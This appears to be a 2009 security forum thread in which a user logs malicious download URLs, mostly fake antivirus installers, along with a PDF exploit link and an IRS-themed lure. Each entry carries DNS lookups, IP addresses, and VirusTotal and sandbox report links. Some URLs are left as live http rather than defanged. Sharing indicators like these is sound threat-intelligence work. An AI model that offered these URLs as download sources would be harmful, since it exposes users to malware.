http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10081212&cs=7C257D272767FA948E0A9186A93BE6EA

Code: [Select]
hxxp://recentbaseupdatesv6.com/logo.bmp

$ file logo.bmp
logo.bmp: data

$ dig recentbaseupdatesv6.com +short
84.16.255.108


antispywarelivescanv5.com
recentbaseupdatesv6.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 11, 2009, 05:08:38 pm
Code: [Select]
hxxp://softwareaddonsuploadv3.com/Driver.exe

$ dig softwareaddonsuploadv3.com +short
89.47.237.52

http://www.virustotal.com/analisis/be484ee278ba86af840bbefb4d7d3c76a0091ab06d0f350153c7861732352535-1249979821 4/41
http://anubis.iseclab.org/?action=result&task_id=1f0223f3cacc009d469ff33e4924cea58&format=html



softwareaddonsuploadv3.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 11, 2009, 06:36:04 pm
Code: [Select]
hxxp://antimalwaresecurescanv2.com/download/Install-4a8_2006-39.exe

$ dig antimalwaresecurescanv2.com +short
91.212.107.5
83.133.126.155
83.133.123.174
94.102.48.29
188.40.61.236
94.102.51.26

http://www.virustotal.com/analisis/681a877090b8e2275d781fadd7b9e1fb7700446365cc528db224d67b94cd548a-1250011543 3/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10081224&cs=6545E33A0C238A3850068D1E8B8B5A44


consensualart.cn                                <- originating domain
antimalwaresecurescanv2.com
june-crossover.com
recentbaseupdatesv6.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 12, 2009, 09:39:01 pm
Code: [Select]
http://spywarescannerv4.com/download/Antivirus-b4ba_2015.exe

$ dig spywarescannerv4.com +short
83.133.123.174
94.102.51.26
94.102.48.29
188.40.61.236
91.212.107.5

http://www.virustotal.com/analisis/2b79674aab8e8faae071e057b9f65f3faac1c75a6453bf9db872d6802ea09f1b-1250110200 0/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=10084941&cs=0604BAB0703FA5D36C0943BD14FA3471


spywarescannerv4.com


Title: Re: Mr Clean's dirt
Post by: MysteryFCM on August 13, 2009, 12:33:34 pm
Just out of interest, have you been continuously monitoring these to see how quickly they're going down again? (last checks I did showed they only stayed online for 12-24 hours)
Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 13, 2009, 12:47:18 pm
Code: [Select]
hxxp://silver-metscorp.com/1/pdf.php?spl=pdf_ie2    <- malicious pdf download
hxxp://silver-metscorp.com/1/getexe.php?spl=pdf     <- results in executable download

$ dig silver-metscorp.com +short
211.95.79.114

http://www.virustotal.com/analisis/2cfacea8ae6e16b8baa609d3b47c13af5514e84e4f071dd2884fb207161c3a1f-1248538894 36/41



silver-metscorp.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 14, 2009, 02:27:35 pm
Code: [Select]
hxxp://www.7y3x.cn/svchost.exe

$ dig www.7y3x.cn +short
65.60.6.178

http://www.virustotal.com/analisis/8ecad389c0cdcd1d09514f0ea95e3027518a125755be1cb3e8ea2bcae41ee9d1-1250192251 11/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10098336&cs=C760F317403DD8AF6D5E8F43FE3895F9


7y3x.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 14, 2009, 08:39:04 pm
Code: [Select]
hxxp://exesoftsite.com/flash-plugin.40052.exe

$ dig exesoftsite.com +short
95.211.8.20

http://www.virustotal.com/analisis/1cfbd67d80b37315528494aac9ef76d8222fb67eda4761fa73ab19094ea12a57-1250282281 4/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=10111865&cs=BDD24D14FCC5F49C6230DD66B8170B52


exesoftsite.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 15, 2009, 01:34:57 pm
Code: [Select]
hxxp://snowboard2009.cn/go.php?id=2006-71&key=0522c7066&p=1

$ dig snowboard2009.cn +short
78.46.201.89

hxxp://online-antivir-scanv2.com/download/Antivirus-b90b456_2006-71.exe

$ dig online-antivir-scanv2.com +short
83.133.126.155
91.212.107.5
188.40.61.236
88.198.120.177
88.198.107.25

http://wepawet.iseclab.org/view.php?hash=6a55d36af380d8ac0b4156ac43e28d0e&t=1250343723&type=js
http://www.virustotal.com/analisis/40048afee16ae74db740c8fdbe46d6d5bbb652b5a40fedfcc40c2b87c281dd72-1250322629 1/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=10118210&cs=B7CD4C09C8166562B8085AC246B60898
http://anubis.iseclab.org/?action=result&task_id=1105b02ae9347dc3481ec1f33fe2f376a&format=html
http://www.threatexpert.com/report.aspx?md5=e7f9186573418baff7f2206ee54d8f5a


snowboard2009.cn
online-antivir-scanv2.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 17, 2009, 02:43:35 pm
Code: [Select]
hxxp://yourholidaytoday.cn/go.php?id=2006-39&key=0522c7066&p=1

$ dig yourholidaytoday.cn +short
78.46.201.89


Code: [Select]
hxxp://premium-antivirus-scanv6.com/download/Antivirus-e728d9_2006-39.exe

$ dig premium-antivirus-scanv6.com +short
188.40.61.236
83.133.126.155
94.102.51.26
91.212.107.5
88.198.120.177
88.198.107.25

http://www.virustotal.com/analisis/058a3a3c9cd3be6cbbcfba65f57a81a5310736f8c2e1d7decc4bdb89a4d78df2-1250519541 1/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10142158&cs=835C757633B8C0CB2488D131AAB53B22


yourholidaytoday.cn
premium-antivirus-scanv6.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 17, 2009, 05:15:02 pm
Code: [Select]
hxxp://premium-antispy-scanv3.com/download/Antivirus-1408e3_2024-3.exe

$ dig premium-antispy-scanv3.com +short
91.212.107.5
83.133.126.155
94.102.51.26
188.40.61.236
88.198.120.177
88.198.107.25

http://www.virustotal.com/analisis/058a3a3c9cd3be6cbbcfba65f57a81a5310736f8c2e1d7decc4bdb89a4d78df2-1250525395 1/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10142158&cs=835C757633B8C0CB2488D131AAB53B22


premium-antispy-scanv3.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 18, 2009, 12:00:03 pm
Code: [Select]
hxxp://www.bulletproofsoft.com/download/bpssrsk.exe

$ dig www.bulletproofsoft.com +short
75.125.246.34

http://www.virustotal.com/analisis/fba381200451586c98dfebead14349827ff78ff8dbe3eadb75741c4f3e99ce9b-1250597035 13/38
http://anubis.iseclab.org/?action=result&task_id=14e49b7cb0f108c4449aebe53c69b9621&format=html

http://www.malwaredomainlist.com/mdl.php?search=75.125.246&colsearch=All&quantity=50


bulletproofsoft.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 18, 2009, 06:45:24 pm
Code: [Select]
hxxp://antivirusplus2010.com/install/avplus.exe

$ dig antivirusplus2010.com +short
195.95.151.176

http://www.virustotal.com/analisis/2241106c125ee4751fdafac89a73cc76d655be9decad021797c419873e70efe7-1250621461 7/41
http://anubis.iseclab.org/?action=result&task_id=1b2ce15ca9edeec9441891a3b418372ee
http://research.sunbelt-software.com/ViewMalware.aspx?id=10155914&cs=E8326541FCDF6A7F6D0626CFAA475224

http://www.malwaredomainlist.com/mdl.php?search=195.95.151&colsearch=All&quantity=50


antivirusplus2010.com
antivirplus2009.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 20, 2009, 03:34:37 pm
Code: [Select]
hxxp://nothing-to-wear.cn/go.php?id=2015&key=ace6725ec&p=1

$ dig nothing-to-wear.cn +short
78.46.201.89

http://www.malwaredomainlist.com/mdl.php?search=78.46.201&colsearch=All&quantity=50

redirects to:
Code: [Select]
hxxp://check-for-malwarev3.com/download/Antivirus-90ca45c_2015.exe

$ dig check-for-malwarev3.com +short
88.198.107.25
91.212.107.5
91.212.127.200
88.198.120.177
94.102.51.26

http://www.virustotal.com/analisis/e081d27500bb839d337c2a2591b0111adc82fa55aa996d180d7b0989c8d64234-1250782156 3/41

http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10179225&cs=E150C1F3AEABC0698B526BFF6F8BF873
http://www.threatexpert.com/report.aspx?md5=351ae6a77c4f51b1199f05af9f9faf59
http://anubis.iseclab.org/?action=result&task_id=1d576d2b8b2abbb44d95ee94d900b379c

http://www.malwaredomainlist.com/mdl.php?search=94.102.51&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.198.107&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.198.120&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=91.212.107&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=91.212.127&colsearch=All&quantity=50


nothing-to-wear.cn
check-for-malwarev3.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 20, 2009, 08:46:06 pm
Code: [Select]
http://aware-of-future.cn/go.php?id=2009-01&key=cd19f5036&p=1

$ dig aware-of-future.cn +short
78.46.201.89

results in this download:

Code: [Select]
hxxp://safeonlinescannerv4.com/download/Antivirus-1408e3a_2009-1.exe

$ dig safeonlinescannerv4.com +short
88.198.107.25
88.198.120.177
91.212.127.200
91.212.107.5
94.102.51.26

http://www.virustotal.com/analisis/e081d27500bb839d337c2a2591b0111adc82fa55aa996d180d7b0989c8d64234-1250793069 3/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10179225&cs=E150C1F3AEABC0698B526BFF6F8BF873


aware-of-future.cn
safeonlinescannerv4.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 21, 2009, 03:07:20 pm
Code: [Select]
http://getbestsales.cn/go.php?id=2024-02&key=487c65abf&p=1

$ dig getbestsales.cn +short
78.46.201.89

results in download

Code: [Select]
hxxp://safeonlinescanv4.com/download/Antivirus-fc9e_2024-2.exe

$ dig safeonlinescanv4.com +short
88.198.120.177
94.102.51.26
88.198.107.25
91.212.127.200
91.212.107.5


http://www.virustotal.com/analisis/0aff535025da634992bd27d3189cc31e510f59b541d20c4607d6559ef064b844-1250863949 1/41
http://anubis.iseclab.org/?action=result&task_id=176947d54f621ed1451219a5d70d6d5e6&format=html
http://research.sunbelt-software.com/ViewMalware.aspx?id=10202330&cs=42A7D96E9153260C9092E43270D400BC



getbestsales.cn
safeonlinescanv4.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 25, 2009, 01:47:47 pm
Code: [Select]
hxxp://db-keyz.com/uniblue_registry_booster_2009_new.exe

$ dig db-keyz.com +short
211.95.78.79


http://www.virustotal.com/analisis/6b7fb2e74de4c99cd5b8167e9a9f663f1203844c62d039e9281db63cd4077035-1251205159 13/41
http://www.malwaredomainlist.com/mdl.php?search=211.95.78&colsearch=All&quantity=50


db-keyz.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 25, 2009, 03:16:37 pm
Code: [Select]
hxxp://wheels-on-fire.cn/go.php?id=2007&key=cc50a9ed9&p=1

$ dig wheels-on-fire.cn +short
94.102.48.29

resulted in this download

Code: [Select]
hxxp://antivirus-scannerv12.com/download/Antivirus-420d9_2024-2.exe

$ dig antivirus-scannerv12.com +short
88.198.120.177
91.212.107.5
94.102.51.26
88.198.107.25
91.212.127.200
78.46.251.43

hxxp://getyourantivirusv3.com/download/Antivirus-158154_2007.exe

$ dig getyourantivirusv3.com +short
78.46.251.43
94.102.51.26
91.212.107.5
88.198.107.25
91.212.127.200
88.198.120.177

http://www.virustotal.com/analisis/5e67b8dc97ac617823f34f5d0d9ba46fe2a73c759febc7be61bfefbdab504c60-1251206828 0/41


wheels-on-fire.cn
antivirus-scannerv12.com
getyourantivirusv3.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 25, 2009, 03:58:22 pm
Code: [Select]
hxxp://softwareupdatesv6.com/template.bmp

$ file template.bmp
template.bmp: data

$ dig softwareupdatesv6.com +short
94.102.48.28

http://www.malwaredomainlist.com/mdl.php?search=94.102.48&colsearch=All&quantity=50


softwareupdatesv6.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 26, 2009, 03:01:45 pm
Code: [Select]
hxxp://clean-all-spyware.com/download/Antivirus_34s1.exe

$ dig clean-all-spyware.com +short
88.198.105.149
88.198.233.225

http://www.virustotal.com/analisis/ee63aec1d0c4cc6e4aab81cdccfcf43608965618fce0d15acbc9f088b9cec68c-1251293402 2/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10287181&cs=6634193D9555278D91A541309DC9C83C
http://anubis.iseclab.org/?action=result&task_id=1e75a7b020e8a3fc4d5b358e641282da1&format=html

http://www.malwaredomainlist.com/mdl.php?search=88.198.105&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.198.233&colsearch=All&quantity=50


clean-all-spyware.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 26, 2009, 08:13:56 pm
Code: [Select]
hxxp://chinafavorites.cn/go.php?id=2007&key=cc50a9ed9&p=1

$ dig chinafavorites.cn +short
94.102.48.29

results in download of

Code: [Select]
hxxp://getyoursecuritynowv2.com/download/Antivirus-8a4a931_2007.exe

$ dig getyoursecuritynowv2.com +short
78.46.251.43
88.198.120.177
94.102.51.26
91.212.127.200
88.198.107.25
91.212.107.5

http://www.virustotal.com/analisis/7162d0f78336fe8087a17df30c74ac4369dca1b38f447f5ef19535ce8838a8f8-1251316028 4/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10287437&cs=8861108D2BF0DBB78EDB165555550697
http://anubis.iseclab.org/?action=result&task_id=13470eeef70dba974d1cfd4850152389b

http://www.malwaredomainlist.com/mdl.php?search=78.46.251&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.198.107&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.198.120&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=91.212.107&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=94.102.51&colsearch=All&quantity=50


chinafavorites.cn
getyoursecuritynowv2.com

Title: Re: Mr Clean's dirt
Post by: sriramp on August 27, 2009, 01:01:10 am
Hi,

Currently, the redirection of this is from here
Code: [Select]
hxxp://chinafavorites.cn/go.php?id=2007&key=cc50a9ed9&p=1to here
Code: [Select]
http://scanforvirusonlinev3.com/download/Antivirus-420d9_2007.exe
The SHA i got is D1B6F97E7D17950D92BF0A7BBB36023440D4F025
Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 27, 2009, 12:39:31 pm
Code: [Select]
http://bulkdvdreader.cn/go.php?id=2004&key=ff0057594&p=1

$ dig bulkdvdreader.cn +short
94.102.48.29

redirects to

Code: [Select]
hxxp://live-virus-scanner7.com/download/Antivirus-944_2004.exe

$ dig live-virus-scanner7.com +short
91.212.127.200
94.102.51.26
88.198.120.177
88.198.107.25
78.46.251.43
91.212.107.5

http://www.virustotal.com/analisis/8e72b04b24a2987fd72df1b5254a1757f8c667a33c348870d817dbf9babf692e-1251372822 2/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10296500&cs=7900BB8476E9DEC475BE664DD71E1372


bulkdvdreader.cn
live-virus-scanner7.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 27, 2009, 02:40:23 pm
Code: [Select]
hxxp://winsoftwareupdatesv2.com/Driver.exe

$ dig winsoftwareupdatesv2.com +short
89.47.237.52

http://www.virustotal.com/analisis/d3d69559a03399b547f99c5bc0a021b7f9495b6b931d430e2782bf7d10e1a013-1251353812 11/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10287457&cs=928496AAB7333D28FDB870E5862B81EB
http://anubis.iseclab.org/?action=result&task_id=17f7438dbeee43d54b5e5e0c0faee0157&call=first

http://www.malwaredomainlist.com/mdl.php?search=89.47.237&colsearch=All&quantity=50


winsoftwareupdatesv2.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 27, 2009, 06:57:34 pm
Code: [Select]
hxxp://wareseekerdownload.com/download35174/setup.exe

$ dig wareseekerdownload.com +short
208.79.201.206

http://www.virustotal.com/analisis/459aafeaa08153fb321dcaedf4e1d4424a553ae1c64c98b10fbfbf4d40667be0-1251393824 7/39
http://anubis.iseclab.org/?action=result&task_id=198805cadba42b8d491b92800c91162dc&format=html
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10298791&cs=A6C6C8CB93CF73D1CD2E0EBB633E490C


wareseekerdownload.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 27, 2009, 07:03:57 pm
Code: [Select]
hxxp://remove-pc-spyware.com/download/Antivirus_88s1.exe

$ dig remove-pc-spyware.com +short
88.198.105.149
88.198.233.225


http://www.virustotal.com/analisis/cb0219a0b9c80eab20c28f9383d18dda850c2033748862861bafb67d0289950a-1251386253 1/41
http://anubis.iseclab.org/?action=result&task_id=1f208856ca1b83e34f1575af74caa31ec&format=html
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10299076&cs=B733EC35E72097B3D933B51E27B3F947


http://www.malwaredomainlist.com/mdl.php?search=88.198.105&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=88.198.233&colsearch=All&quantity=50


remove-pc-spyware.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 31, 2009, 12:46:46 pm
Code: [Select]
hxxp://tryantivirusscan.com/download/Antivirus_162.exe

$ dig tryantivirusscan.com +short
193.169.12.70
78.46.201.89

http://www.virustotal.com/analisis/6118fe410e1f8092391962766c5aa1d6c1f8260e038eebccb58d15f19e4504a2-1251721678 1/41
http://research.sunbelt-software.com/ViewMalware.aspx?id=10336371&cs=605A7031F366DC28B4F72870413D0644
http://anubis.iseclab.org/?action=result&task_id=1e81a4f001d9d3d845d7201dba835189a


tryantivirusscan.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 31, 2009, 01:00:31 pm
Code: [Select]
hxxp://best-live-lottery.cn/go.php?id=2006-54&key=0522c7066&p=1

$ dig best-live-lottery.cn +short
94.102.48.29

redirects

Code: [Select]
hxxp://antispyware-scanner2.com/download/Antivirus-fc2_2006-54.exe

$ dig antispyware-scanner2.com +short
91.212.127.200
88.198.107.25
88.198.120.177
78.46.251.43
91.212.107.5
94.102.51.26

http://www.virustotal.com/analisis/848a92b1a3294ea47d3a2b02eff865347c236ef676c09422470a75acf0841824-1251717896 1/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10336396&cs=4F9BE2685E7224BB43B9A2D2118363D5
http://anubis.iseclab.org/?action=result&task_id=19dd62891540c4fe4c549a6a2b37c449a


best-live-lottery.cn
antispyware-scanner2.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 31, 2009, 05:54:11 pm
Code: [Select]
http://justseethisonline.com/?pid=58s02&sid=9f93bc

$ dig justseethisonline.com +short
193.169.12.70

redirects to

Code: [Select]
hxxp://tryantivir-scanner.com/download/Antivirus_58s2.exe

$ dig tryantivir-scanner.com +short
193.169.12.70
78.46.201.89

http://www.virustotal.com/analisis/6118fe410e1f8092391962766c5aa1d6c1f8260e038eebccb58d15f19e4504a2-1251722575 1/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10336371&cs=605A7031F366DC28B4F72870413D0644


justseethisonline.com
tryantivir-scanner.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 31, 2009, 06:04:04 pm
Code: [Select]
http://virscan-online1.com/download/Antivirus_162.exe

$ dig virscan-online1.com +short
193.169.12.70
78.46.201.89

http://www.virustotal.com/analisis/6118fe410e1f8092391962766c5aa1d6c1f8260e038eebccb58d15f19e4504a2-1251722575 1/41


virscan-online1.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on August 31, 2009, 10:37:16 pm
Code: [Select]
hxxp://live-virus-scanner9.com/download/Antivirus-7939d_2004.exe

$ dig live-virus-scanner9.com +short
78.46.251.43
88.198.120.177
88.198.107.25
91.212.127.200
91.212.107.5
94.102.51.26

http://www.virustotal.com/analisis/848a92b1a3294ea47d3a2b02eff865347c236ef676c09422470a75acf0841824-1251756245 4/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10336396&cs=4F9BE2685E7224BB43B9A2D2118363D5
http://anubis.iseclab.org/?action=result&task_id=1b31396b87c21b9a4958847ce1c0de98a&format=html


live-virus-scanner9.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 01, 2009, 01:46:21 am
Code: [Select]
http://antivirus-scanner6.com/download/Antivirus-c517d68_2024-7.exe

$ dig antivirus-scanner6.com +short
78.46.251.43
91.212.127.200
91.212.107.5
88.198.120.177
88.198.107.25
94.102.51.26

http://www.virustotal.com/analisis/848a92b1a3294ea47d3a2b02eff865347c236ef676c09422470a75acf0841824-1251761602 6/41


antivirus-scanner6.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 01, 2009, 04:02:33 pm
Code: [Select]
hxxp://antivirus-promo-scan.com/download/Antivirus_162.exe

$ dig antivirus-promo-scan.com +short
193.169.12.70
78.46.201.89

http://www.virustotal.com/analisis/800859dd71fa83164c4524151b002e5cf1814ddd7ee74983984acbbe1cd337c2-1251816883 2/39
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10349176&cs=7F86286B7DB9956BA41EE33F90B75DC8


antivirus-promo-scan.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 02, 2009, 01:13:27 pm
Code: [Select]
hxxp://tom-hanks.cn/go.php?id=2033-01&key=9562b5cdd&p=1

$ dig tom-hanks.cn +short
83.133.126.155

redirects to

Code: [Select]
hxxp://best-antivirus3.com/download/Antivirus-767_2033-1.exe

$ dig best-antivirus3.com +short
91.212.127.200
94.102.51.26
78.46.251.43
88.198.107.25
88.198.120.177
91.212.107.5

http://www.virustotal.com/analisis/340b8b756888e3a08077845fd4aa7ddd727b64144376efa2fdbf604ada506b14-1251885393 1/40


tom-hanks.cn
best-antivirus3.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 03, 2009, 12:37:22 pm
Code: [Select]
hxxp://iwanttowin.cn/go.php?id=2006-56&key=0522c7066&p=1

$ dig iwanttowin.cn +short
94.102.48.29

redirects to

Code: [Select]
hxxp://best-antivirus8.com/download/Antivirus-75ff09_2006-56.exe

$ dig best-antivirus8.com +short
78.46.251.43
94.102.51.26
88.198.107.25
88.198.120.177
91.212.127.200
91.212.107.5

http://www.virustotal.com/analisis/58a074eb39b35ceff79df89700a7e16a235e9a19b2f781aeefef7f51986a458a-1251978513 0/41


iwanttowin.cn
best-antivirus8.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 04, 2009, 11:35:31 am
Code: [Select]
hxxp://winfirewallupdatesv2.com/Driver.exe

$ dig winfirewallupdatesv2.com +short
89.47.237.52

http://www.virustotal.com/analisis/323292d421d5b97940e14833ff305b50a37e415929a3ec5bbbad7fb1c8772afd-1251961196 17/41


winfirewallupdatesv2.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 04, 2009, 02:43:42 pm
Code: [Select]
hxxp://best-live-virus-scanner7.com/go.php?id=2009-1480&key=cd19f5036&p=1

$ dig best-live-virus-scanner7.com +short
94.102.48.29

redirects to

Code: [Select]
hxxp://antimalwarescanner8.com/download/Antivirus-4f49_2009-1480.exe

$ dig antimalwarescanner8.com +short
91.212.107.5
91.212.127.200
94.102.51.26
78.46.251.43
88.198.107.25
88.198.120.177

http://www.virustotal.com/analisis/6a761c86645ca3b8b808a80f330ffb315dc5c175089abf7f8ff9ea2ddbbc57b2-1252072393 3/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10380261&cs=4D540AF96384B93F7B4D60E5528F0E27


best-live-virus-scanner7.com
antimalwarescanner8.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 04, 2009, 07:14:57 pm
Code: [Select]
hxxp://redexedirect.com/flash-plugin_update.40039.exe

$ dig redexedirect.com +short
213.239.211.251

http://www.virustotal.com/analisis/e48c426c8b996a6509d28fcd6b0512ced88681faa606c5229484423d5b4a36fd-1252091407 2/41
http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=10386139&cs=D3DD35E87BCE2095A9930B4E5F089ADB
http://anubis.iseclab.org/?action=result&task_id=18c12f053d7ab13e4d5614760e9ebf5e7


redexedirect.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 09, 2009, 02:27:12 pm
Code: [Select]
hxxp://batman-comics.cn/go.php?id=2031&key=6c2039a17&p=1

$ dig batman-comics.cn +short
94.102.48.29


hxxp://quick-virus-scanner02.com/download/Scanner-592_2031.exe

$ dig quick-virus-scanner02.com +short
94.102.51.26
88.198.107.25
91.212.107.5
91.212.127.200

http://www.virustotal.com/analisis/521376ae769d46cdbac20e6b10ebaa03e14f4d01a6d3b95524a0675770204783-1252501662 2/41


batman-comics.cn
quick-virus-scanner02.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 10, 2009, 01:38:08 pm
Code: [Select]
hxxp://radioheadicon.cn/go.php?id=2006-71&key=0522c7066&p=1

$ dig radioheadicon.cn +short
94.102.48.29

hxxp://antivirusonlinescan03.com/download/Scanner-7939d6_2006-71.exe

$ dig antivirusonlinescan03.com +short
94.102.51.26
88.198.107.25
91.212.107.5


http://www.virustotal.com/analisis/0418ba6eb5bedab239d7e25673fa8a1b0f70021fd5058b0035177642021bb851-1252589740 3/41


radioheadicon.cn
antivirusonlinescan03.com
Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 11, 2009, 02:53:01 pm
Code: [Select]
hxxp://shrekmovie.cn/go.php?id=2009-1692&key=cd19f5036&p=1

$ dig shrekmovie.cn +short
94.102.48.29


hxxp://best-spyware-scan03.com/download/Scanner-9139_2009-1692.exe

$ dig best-spyware-scan03.com +short
94.102.51.26
88.198.107.25
91.212.107.5

http://www.virustotal.com/analisis/dffe1a48132a8a87ff9021c269c84faba6c1a5cfb79a3dafa0622898868fb1df-1252680517 2/41
http://anubis.iseclab.org/?action=result&task_id=1f368a2507c6940d4cd769aa95e9136a3


shrekmovie.cn
best-spyware-scan03.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 12, 2009, 07:07:47 am
Code: [Select]
hxxp://barada1.cn/cod/video_codec1.56.987_setup.exe

$ dig barada1.cn +short
91.214.45.101

http://www.virustotal.com/analisis/9f34a333be28432cad59126be86f8b5fb4e4a450b832a0e46f5a3ea233345902-1252738931 9/41


barada1.cn

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 13, 2009, 03:16:29 pm
Code: [Select]
hxxp://softwaresecurityupdate3.com/Driver.exe
$ dig softwaresecurityupdate3.com +short
91.212.127.201

http://www.virustotal.com/analisis/289616c4f65aa326c1907de12af0355de76491730c5aae6abf71585e36a347b5-1252620138 14/41


softwaresecurityupdate3.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 14, 2009, 06:02:38 pm
Code: [Select]
hxxp://www.irs.gov.1kikyt.eu/fraud_application/directory/tax-statement.exe

$ dig www.irs.gov.1kikyt.eu +short
85.202.49.44
88.156.250.62
89.229.198.123
93.100.252.207
117.200.130.73
189.62.165.72
200.127.193.214
62.47.4.246
70.213.49.209
77.28.213.8
78.177.242.34
81.215.28.133
83.6.90.61
83.20.60.183
83.27.166.51

http://www.virustotal.com/analisis/2c0bc33bc07a341a768ab073d7ad96a347f5c80480fee50dec99b4cf37a9992a-1252950255 10/41


1kikyt.eu

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 15, 2009, 11:48:06 am
Code: [Select]
hxxp://usdisturbed.cn/?pid=118s20&sid=00562f

$ dig usdisturbed.cn +short
193.169.12.70


hxxp://fast-virus-scan4.com/download/Soft_118s20.exe

$ dig fast-virus-scan4.com +short
91.213.126.100
193.169.12.70

http://www.virustotal.com/analisis/f6cd1730ef43e73cfb803e12703c6941a24b5a889af77f55ec66e628a64a5146-1253014558 2/41


usdisturbed.cn
fast-virus-scan4.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 15, 2009, 08:13:24 pm
Code: [Select]
hxxp://myth-busters.cn/go.php?id=2009-1506&key=cd19f5036&p=1

$ dig myth-busters.cn +short
94.102.48.29

hxxp://005threats-scanner.com/download/Scanner-81541_2009-1506.exe

$ dig 005threats-scanner.com +short
78.46.201.89
78.46.251.41
88.198.81.153
88.198.120.177
78.46.118.1

http://www.virustotal.com/analisis/d826f7910ee42715a28b640a06ecaa7b61d0e1265665a8441095be24529b32b5-1253039474 2/41


myth-busters.cn
005threats-scanner.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 16, 2009, 12:16:23 am
Code: [Select]
hxxp://paulmccartneyusa.cn/?pid=149&sid=46335d

$ dig paulmccartneyusa.cn +short
193.169.12.70


hxxp://delete-all-virus01.com/download/Soft_149.exe

$ dig delete-all-virus01.com +short
193.169.12.70
91.213.126.100

http://www.virustotal.com/analisis/26687a06401fa7baee57b9ee8a352315e3c6e517b2814183d28106ed00859bff-1253059559 3/41


paulmccartneyusa.cn
delete-all-virus01.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 16, 2009, 10:26:10 pm
Code: [Select]
hxxp://fallsoftsafety.com/streamviewer.45043.exe

$ dig fallsoftsafety.com +short
64.191.22.150

http://www.virustotal.com/analisis/28234c64f6de05387e4e7757ae85606fa49dc93ac96c50897d00497493768e3e-1253139606  6/41


fallsoftsafety.com

Title: Re: Mr Clean's dirt
Post by: Mr Clean on September 17, 2009, 02:58:50 pm
Code: [Select]
hxxp://teacherslounge.cn/go.php?id=2004&key=ff0057594&p=1

$ dig teacherslounge.cn +short
94.102.48.29


hxxp://6malwarescan.com/load/Scaner-be0c5cd_2004-4.exe

$ dig 6malwarescan.com +short
88.198.120.177
78.46.118.2
78.46.201.89
78.46.251.41
88.198.81.153

